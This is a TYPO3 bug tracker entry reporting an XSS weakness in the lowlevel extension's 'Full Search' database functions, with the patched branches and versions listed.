Bug #21333

Sysext:lowlevel (function "DB>Full search") susceptible to XSS

Added by Ernesto Baschny about 10 years ago. Updated over 9 years ago.

Status:
Closed
Priority:
Should have
Category:
-
Target version:
-
Start date:
2009-10-22
Due date:
% Done:

0%

TYPO3 Version:
4.2
PHP Version:
4.3
Tags:
Complexity:
Is Regression:
Sprint Focus:

Description

Sysext:lowlevel provides, amongst others, a function called "Full Search" that allows to query the database directly. Both sub-functions "raw search in all fields" and "advanced query" are susceptible to XSS as both modules fail to sanitize results.

Reported by Markus Krause

Security Team OTRS reference: 2009091210000033
(issue imported from #M12308)

History

#1 Updated by Ernesto Baschny about 10 years ago

Commited to:
TYPO3_4-2 (rev.6247 = 4.2.10)
TYPO3_4-1 (rev.6248 = 4.1.11)

Note that trunk (4.3) is not affected.

Also available in: Atom PDF